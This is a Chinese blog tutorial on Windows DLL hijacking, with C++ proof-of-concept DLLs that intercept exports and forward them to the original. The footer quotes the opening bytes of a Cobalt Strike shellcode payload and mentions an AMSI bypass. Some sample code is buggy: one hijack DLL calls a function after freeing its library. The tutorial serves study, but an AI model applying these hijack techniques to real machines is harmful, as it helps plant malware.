DLL劫持技术解析(DLL Hijack)

最新推荐文章于 2024-04-18 09:58:32 发布
最新推荐文章于 2024-04-18 09:58:32 发布
阅读量3.5k 收藏 15
点赞数 2
分类专栏: 病毒技术
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-NC-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37232329/article/details/95510227
版权

0x01 简介

DLL劫持技术利用的是Windows对DLL访问时查找DLL位置的一个漏洞,Windows对DLL的默认查找顺序(XP SP2及之后)如下:

1. EXE所在文件夹

2. Windows系统目录

3. Windows 16位系统目录

4. Windows目录

5. 当前文件夹

6. PATH环境变量中指出的目录

当我们在EXE程序中导入了某个DLL文件时,其搜索并使用DLL的顺序就是如上。可以看到第5点我标红了

原因是在XP SP2之前Windows默认的DLL搜寻路径与此不一样,感兴趣可以自己去查找,

由于目前Windows平台操作系统大部分都是Win10至少是Win7,所以便直接用这个顺序作为例子。

那这个顺序到底是什么意思呢?  假设有一个DLL叫做example.dll并且位于Windows目录即C:\\Windows\\example.dll。

然后有一个EXE程序假设名叫a.exe调用了该DLL。

这个漏洞就在于a.exe并不是直接去C:\\Windows中寻找example.dll而是按照上述顺序,即先在a.exe自身所在的文件夹中寻找example.dll,如果没有就去Windows系统目录下寻找一直这样下去....直到找到相同名称的DLL文件为止。

注意这里最关键就是DLL的查到与否是按照DLL名称来确定的,名称一样就算找到了,假设有我们调用的DLL位于Windows目录下,而我们在Windows目录下之前(标号为1-3)的任意目录内放入同名的伪造DLL并在其中执行我们想执行的代码最后转发至原本的位于Windows目录下的DLL让其执行原本的功能,这就悄无声息的成功进行劫持并执行了我们的代码。

0x02 DLL劫持手动构造

这里我们来手动构造一下DLL劫持的过程,手动构造的意思就是通过动态载入和释放。首先给出测试代码:

这里是原本的DLL(即被劫持的DLL):

#include <windows.h>
#include <tchar.h>
#include <StrSafe.h>
#include <cstdio>

BOOL WINAPI DllMain(HINSTANCE hInst, DWORD fdwReason, LPVOID lpReserved) {
	TCHAR szFileName[MAX_PATH] = { 0 };
	switch (fdwReason) {
	case DLL_PROCESS_ATTACH:
		GetModuleFileName(NULL, szFileName, MAX_PATH);
		_tprintf("Original Dll' Current Path: %s\r\n", szFileName);
		break;
	case DLL_PROCESS_DETACH:
	case DLL_THREAD_ATTACH:
	case DLL_THREAD_DETACH:
		break;
	}

	return(TRUE);
}

extern "C" __declspec(dllexport) int Add(int a, int b) {
	return(a + b);
}

这里是劫持原本DLL的新DLL:

#include <windows.h>
#include <tchar.h>
#include <StrSafe.h>
#include <cstdio>

BOOL WINAPI DllMain(HINSTANCE hInst, DWORD fdwReason, LPVOID lpReserved) {
	TCHAR szFileName[MAX_PATH] = { 0 };
	switch (fdwReason) {
	case DLL_PROCESS_ATTACH:
		GetModuleFileName(NULL, szFileName, MAX_PATH);
		_tprintf("Dll Path: %s\r\n", szFileName);
		break;
	case DLL_PROCESS_DETACH:
	case DLL_THREAD_ATTACH:
	case DLL_THREAD_DETACH:
		break;
	}

	return(TRUE);
} 

typedef int (*PFNADD)(int, int);

extern "C" __declspec(dllexport) int Add(int a, int b) {
	TCHAR szSystemDir[MAX_PATH] = {0};

	MessageBox(NULL, "DLL Hijack!", "Info", MB_OK);
	GetSystemDirectory(szSystemDir, MAX_PATH);
	_tcscat_s(szSystemDir, _countof(szSystemDir) * sizeof(TCHAR), "\\Trojan.dll");
	HMODULE hMod = LoadLibrary(szSystemDir);
	if (NULL == hMod)
		return(-1);
	else
		_tprintf("Original Dll Path: %s\r\n", szSystemDir);
	PFNADD pfnAdd = (PFNADD)GetProcAddress(hMod, "Add");
	if (NULL == pfnAdd) 
		return(-1);
        if (hMod)
            FreeLibrary(hMod);

	
	return(pfnAdd(a, b));
}

这里是测试代码:

#include <windows.h>
#include <tchar.h>
#include <cstdio>

int _tmain() {
	HMODULE hMod = NULL;

	hMod = LoadLibrary("Trojan.dll");
	if (!hMod) {
		_tprintf("加载失败!");
		return(-1);
	}
	typedef int (*PFNADD)(int, int);
	PFNADD pfnAdd = (PFNADD)GetProcAddress(hMod, "Add");
	if (NULL == pfnAdd)
		return(-1);
	_tprintf("1000 + 2000 = %d\r\n", pfnAdd(1000, 2000));

	if (hMod) {
		FreeLibrary(hMod);
		hMod = NULL;
	}

	system("pause");

	return(0);
}

来说一下如何使用这些代码:

1. 将两个DLL都改成相同名称

2. 将需要被劫持的DLL放入C:\\Windows\\System32目录下(即Windows系统目录)

3. 将用于劫持的DLL与测试代码文件放在同一个目录下

4. 运行测试代码。

进行如上操作后你就会发现出现了如下:

而原本的DLL功能仅仅是做一个加法。我们执行了自己的代码,也就是一条MessageBox。

0x03 #pragma指令构造函数转发器进行DLL劫持

这种方法是DLL劫持最古老的方法了,利用的是#pragma指令,通过链接器构造转发表。先说一下指令格式:

#pragma comment(linker, "/EXPORT:原导出函数名称=导出原函数的DLL名称.原导出函数名称")

只要在DllMain下方写上这句话就行了。里面的原理就像这样:

这里贴出源代码:

这是劫持用的DLL:

// Trojan.dll
#include <windows.h>
#include <tchar.h>
#include <StrSafe.h>
#include <cstdio>

BOOL WINAPI DllMain(HINSTANCE hInst, DWORD fdwReason, LPVOID lpReserved) {
	TCHAR szFileName[MAX_PATH] = { 0 };
	switch (fdwReason) {
	case DLL_PROCESS_ATTACH:
		MessageBox(NULL, "DLL Hijack!", "Info", MB_OK);
		break;
	case DLL_PROCESS_DETACH:
	case DLL_THREAD_ATTACH:
	case DLL_THREAD_DETACH:
		break;
	}

	return(TRUE);
} 

#pragma comment(linker, "/EXPORT:Add=Old_Trojan.Add") // 构造函数转发器

被劫持的DLL和测试代码与前面0x02中的相同。这里有两注意点

1. 调用劫持用的DLL后要转发回原本DLL。但这里实际上是把原本的DLL复制一份到EXE的目录下名且改成另外一个名称后,让劫持用的DLL直接转发至被改名的原DLL并执行原函数。

2. 函数转发表中要完整构造与原DLL中所有的函数

效果是这样的:

0X04 动态载入方式进行DLL劫持(仅适用于X86)

这种方法其实和0x02中的没多大区别和0x03中的方法也有联系,也需要使用#pragma语法,像是混合体。

这里给出#pragma构造转发表的原型:

#pragma comment(linker, "/EXPORT:entryname[,@ordinal[,NONAME]][,DATA]")

代码如下:

被劫持DLL代码:

#include <windows.h>
#include <tchar.h>
#include <StrSafe.h>
#include <cstdio>

extern "C" __declspec(dllexport) int Add(int a, int b) {
	return(a + b);
}

extern "C" __declspec(dllexport) int Sub(int a, int b) {
	return(a - b);
}

BOOL WINAPI DllMain(HMODULE hInst, DWORD fdwReason, LPVOID lpReserved) {
	TCHAR szFileName[MAX_PATH] = { 0 };
	switch (fdwReason) {
	case DLL_PROCESS_ATTACH:
		GetModuleFileName(NULL, szFileName, MAX_PATH);
		_tprintf("Original Dll' Current Path: %s\r\n", szFileName);
		break;
	case DLL_PROCESS_DETACH:
	case DLL_THREAD_ATTACH:
	case DLL_THREAD_DETACH:
		break;
	}

	return(TRUE);
}

用于劫持的DLL代码:

#include <windows.h>
#include <tchar.h>
#include <StrSafe.h>
#include <cstdio>


PVOID GetAddr(CONST TCHAR* pszFuncName) {
	PVOID lpAddress = NULL;
	HMODULE hMod = NULL;
	TCHAR szDllPath[MAX_PATH] = "C:\\Windows\\System32\\Trojan.dll";

	hMod = LoadLibrary(szDllPath);
	if (NULL == hMod)
		return(NULL);
	lpAddress = GetProcAddress(hMod, pszFuncName);
	FreeLibrary(hMod);

	return(lpAddress);
}

extern "C" __declspec(naked) int New_Add(int a, int b) {
	GetAddr("Add");
	// GetProcAddress执行完结果存在eax寄存器中
	__asm jmp eax
}

extern "C" __declspec(naked) int New_Sub(int a, int b) {
	GetAddr("Sub");
	__asm jmp eax
}

BOOL WINAPI DllMain(HINSTANCE hInst, DWORD fdwReason, LPVOID lpReserved) {
	TCHAR szFileName[MAX_PATH] = { 0 };
	HMODULE hDll = NULL;

	switch (fdwReason) {
	case DLL_PROCESS_ATTACH:
		GetSystemDirectory(szFileName, MAX_PATH * sizeof(TCHAR));
		_tcscat_s(szFileName, _countof(szFileName) * sizeof(TCHAR), "\\Trojan.dll");
		hDll = LoadLibrary("Trojan.dll");
		break;
	case DLL_PROCESS_DETACH:
		if (hDll)
			FreeLibrary(hDll);
		break;
	case DLL_THREAD_ATTACH:
	case DLL_THREAD_DETACH:
		break;
	}

	return(TRUE);
} 

#pragma comment(linker, "/EXPORT:Add=_New_Add,@1")
#pragma comment(linker, "/EXPORT:Sub=_New_Sub,@2")

测试代码不变

这种方法其实与第一种完全一样

 

 

 

 

 

 

Kiopler
关注
  • 2
    点赞
  • 15
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
dll hijack 学习
conman网络安全
09-28 297
声明 本文所涉及程序均在本地运行测试,用于学习目的,请勿用于非法用途。 前言 学习一下dll hijackdll proxy 可以根据链接1进行实验,本文给一个dll hijack的例子。 程序分析 程序见文末。 参见链接2,dll被加载时,DLL_PROCESS_ATTACH分支会被调用,所以可以在里面写对应的逻辑完成测试,本程序以一个MessageBox弹窗进行展示。 运行 运行processmonitor,设置filter,Path end with .dll,Result contains NO
cpp-SuperDllHijack一种通用Dll劫持技术不再需要手工导出Dll的函数接口了
08-16
SuperDllHijack 一种通用Dll劫持技术,不再需要手工导出Dll的函数接口了
Windows 下的 7 种 DLL 劫持技术
weixin_33766805的博客
09-18 1497
本文讲的是Windows 下的 7 种 DLL 劫持技术,在本文中,我将列出半打可以在Windows运行用户模式的进程中使用DLL注入技术。也许可能会有更多类似的技术,但我正在和你分享的是我所拥有的第一手的技术。 AppInit_DLLs 人们以前往往依赖于AppInit_DLLs注册表项。它是操作系统加载程序查询此值并加载创建进程时指定的DLL。我在...
DLLHijack漏洞原理
weixin_33898876的博客
12-28 179
原理 当一个可执行文件运行时,windows加载器讲课执行模块映射到进程的地址空间中,加载器分析可执行模块的输入表,并设法找出任何需要的DLL,并将它们映射到进程的地址空间中。 由于输入表中只包含DLL名而没有它的路径名,因此加载程序必须在磁盘上搜索DLL文件。而这里DLL文件搜索遵循以下顺序。 可执行程序加载的目录 系统目录 16位系统目录 Windows目录 ...
DLL劫持漏洞
m0_62207482的博客
03-11 200
DLL劫持利用系统未知DLL的搜索路径方式,使得程序加载当前目录下的系统同名DLL。所以可 以告诉系统DLL的位置,改变加载系统DLL的顺序不是当前目录,而是直接到系统目录下查找。(hijack)了。伪造的dll制作好后,放到程序当前目录下,这样当原程序调用原函数时就调 用了伪造的dll的同名函数,进入劫持DLL的代码,处理完毕后,再调用原DLL此函数。程序调用系统DLL时会先调用当前目录下伪造的 DLL,完成相关功能后,再跳到系统DLL同名函数里执行。这个过程用个形象的词来描述,就是系统DLL劫持
DLL Hijack Auditor 3.5(DLL劫持检测)汉化版.rar
09-04
软件介绍: DLL Hijack Auditor使用方法:选择应用程序(选择或拖动EXE文件到软件中),点击开始检测按钮,启动文件检测,开始应用程序的DLL劫持漏洞检测。DLL Hijack Auditor能够检测你的应用程序是否被劫持,一些恶意程序为了达到某一目的,会劫持软件的DLL动态库文件,这款Dll Hijack Auditor工具来实现防止劫持的目的,它可以一键检测Dll文件是否被劫持,哪些被劫持了,这样就能一目了然防止这些木马软件运行。能检测系统里所有的程序和应用,软件使用智能算法来对DLL劫持进行拦截,支持多种文件扩展后缀。
AheadLib-x86-x64:hijack dll源代码生成器。 支持x86x64
05-25
AheadLib-x86-x64 hijack dll Source Code Generator. support x86/x64 snapshot screen 不支持导出符号带有??的方法! NOTE Pay attention to the generated file header prompt information
DLL劫持-Hijack-原理及其实现细节
08-21
DLL劫持-Hijack-原理及其实现细节
探索ImpulsiveDLLHijack:一个Windows DLL劫持漏洞研究工具
最新发布
gitblog_00027的博客
04-18 266
探索ImpulsiveDLLHijack:一个Windows DLL劫持漏洞研究工具 项目地址:https://gitcode.com/knight0x07/ImpulsiveDLLHijack ImpulsiveDLLHijack是一个开源项目,由knight0x07创建并维护,旨在帮助安全研究人员和开发人员理解和检测Windows系统中的动态链接库(DLL劫持问题。通过该项目,你可以深入了...
Error: could not find java.dll Error: Could not find Java SE Runtime Environment解决方法
热门推荐
SWY's Workshop
03-01 1万+
java Error: could not find java.dll Error: Could not find Java SE Runtime Environment解决方法
dll劫持
qq_46804551的博客
05-04 5642
aheadlib工具劫持 可以看见生成了一个cpp文件,然后我们创建一个dll文件 将生成的cpp文件替换到如下文件 添加#include “pch.h” 填加如下代码 /* cs的payload length: 892 bytes */ unsigned char buf[] = "\xfc\x48\x83\xe4\xf0\xe8\xc8\x00\x00\x00\x41\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b
如何利用 DLL hijack 轻松绕过AMSI?
weixin_33735077的博客
09-25 285
本文讲的是如何利用 DLL hijack 轻松绕过AMSI?,最近在做一些关于Windows 10中新的反恶意软件扫描接口技术内部机制的研究,我发现PowerShell 5中存着在DLL劫持漏洞。我之所以做这些研究是因为我们Red Team所使用的一些PowerShell攻击脚本——p0wnedShell被安装在Windows 10的 Windows D...
易语言DLL劫持生成 最新劫持技术-易语言
06-11
DLL劫持算是一个很古老的技术了,早在XP时代就有臭名昭著的lpk .dll劫持,病毒通过伪装系统 lpk .dll达到注入目标进程,为什么会被劫持呢?因为在程序执行的时候会在当前目录搜索 lpk .dll文件,如果文件存在就会被...
易语言-易语言DLL劫持
06-25
一些木马或病毒也会利用DLL劫持技术搞破坏,因此当在应用程序目录下发现系统一些DLL文件存在时,如lpk.dll,应引起注意。 首先 运行exe他会把需要的DLL加载进来,加载的目录如无特别的制定的话,现在当前目录找,...
dll_hijack_detect:检测 Windows 系统上正在运行的进程中的 DLL 劫持
06-15
dll_hijack_detect 检测 Windows 系统上正在运行的进程中的 DLL 劫持用法:dll_hijack_detect.exe [/unsigned] [/verbose] 可选参数: /unsigned - 仅标记其中至少一个未签名的 DLL /verbose - 显示在多个搜索顺序...
开机自启动的几种方式
輚至消亡
06-30 7843
0x01 快速自启动目录 快速启动目录自启动方式源于Windows中的一个目录,这个目录一般叫"启动"或者"Startup"。位于该目录下的PE文件会在开机后进行自启动。由于不同版本的Windows启动目录的路径都是不同的,所以我们用一个SHGetSpecialFolderPath来获取该路径。该API位于ShlObj.dll中。我们用隐式载入方式获取。先看MSDN: 该API有四个参数。...
基于Windows上的几种提权手段
輚至消亡
07-01 5628
0x01 进程未筛选的令牌提权 自从Vista之后Windows就开始实行了UAC机制(https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-R2-and-2008/dd835540(v=ws.10))。 无论是标准用户还是特权用户都以标准用户权限运行程序。除非用户特别选择以管...
NtQuerySystemInformation来遍历显示进程
輚至消亡
12-19 3887
NtQuerySystemInformation属于未公开的函数,没有文档化,头文件中也不存在(winternl.h中有其及其部分数据结构的定义),该函数可以查询到非常大量的系统信息。这里来使用该函数来查询进程名和对应PID。 该代码摘自网络,我对其做了大量的修改,废弃掉了大部分不需要的内容并完善了程序, 其本来的用意是查询特定进程下的特定线程状态,我保留了原程序功能的核心代码仅将其注释掉。 #include <windows.h> #include <tchar.h> #in
汇编与机器码对照(长期记录)
輚至消亡
12-19 3828
je或jz // 相等则跳(机器码是74或84) jne或jnz // 不相等则跳(机器码是75或85) jmp // 无条件跳(机器码是EB) 汇编指令对应机器码表 一、状态寄存器 PSW(Program Flag)程序状态字寄存器,是一个16位寄存器,由条件码标志(flag)和控制标志构成,如下所示: 15 14 13 12 11 10 9 8 7 6 5 4 3 2 1 0 OF DF IF TF SF ZF AF PF CF 条...
Audio Hijack for mac
10-09
C知道: 对于Mac用户来说,Audio Hijack是一款非常流行的录音应用程序。它允许您从各种来源(如麦克风、应用程序和设备)录制音频,并且具有强大的录音和编辑功能。 您可以使用Audio Hijack来记录音频会议、播客、音乐和其他类型的音频。它还可以帮助您捕获在线流媒体、网络广播和其他音频来源。 除了录制功能,Audio Hijack还具有一些内置的音频处理效果,如均衡器、压缩器和降噪器,可以提升录制的音质。它还支持将录制的音频保存为各种格式,包括MP3、AAC、Apple Lossless等。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值